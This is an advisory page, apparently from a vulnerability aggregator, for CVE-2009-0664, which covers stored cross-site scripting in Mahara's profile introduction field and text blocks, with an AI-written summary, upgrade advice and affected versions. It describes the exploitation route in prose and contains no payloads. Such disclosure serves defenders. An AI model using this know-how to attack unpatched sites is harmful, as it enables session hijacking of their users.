VYPR
← All advisories
Unrated severityNVD Advisory· Published Apr 23, 2009· Updated Apr 23, 2026

CVE-2009-0664

CVE-2009-0664

Description

Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0.x before 1.0.11 and 1.1.x before 1.1.3 allow remote attackers to inject arbitrary web script or HTML via (1) the introduction field in a user profile or (2) an arbitrary text block in a user view.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Mahara before 1.0.11 and 1.1.3 contains stored XSS in user profile introduction fields and arbitrary text blocks, allowing arbitrary script injection.

Vulnerability

Multiple cross-site scripting (XSS) vulnerabilities exist in Mahara versions 1.0.x before 1.0.11 and 1.1.x before 1.1.3. The flaws occur when user-supplied input is not properly sanitized before being stored and later rendered. Specifically, the (1) introduction field in a user profile and (2) an arbitrary text block in a user view allow an attacker to inject arbitrary web script or HTML [1].

Exploitation

An attacker with the ability to edit their own user profile or create a user view can inject malicious script into the introduction field or an arbitrary text block. No special network position or authentication is required beyond a standard user account. The injected content is stored on the server and then rendered in the browser of any user who views the affected profile or view, leading to a stored (persistent) XSS attack [1].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of a victim's browser session. This can lead to session hijacking, stealing sensitive information, or performing actions on behalf of the victim within the Mahara application. The impact is limited to the scope of the affected user's privileges [1].

Mitigation

The vulnerability is fixed in Mahara versions 1.0.11 and 1.1.3, which were released on the date of the security announcement [1]. Users are strongly advised to upgrade immediately. No workaround or mitigation short of patching has been identified in the available references.

References
  1. Security announcements - XSS in Mahara 1.0.10 and 1.1.2 - Mahara ePortfolio System

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

23
  • Mahara (software)/Mahara23 versions
    cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*+ 22 more
    • cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*
    • (no CPE)range: >= 1.0.0, < 1.0.11; >= 1.1.0, < 1.1.3

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

7

News mentions

0

No linked articles in our index yet.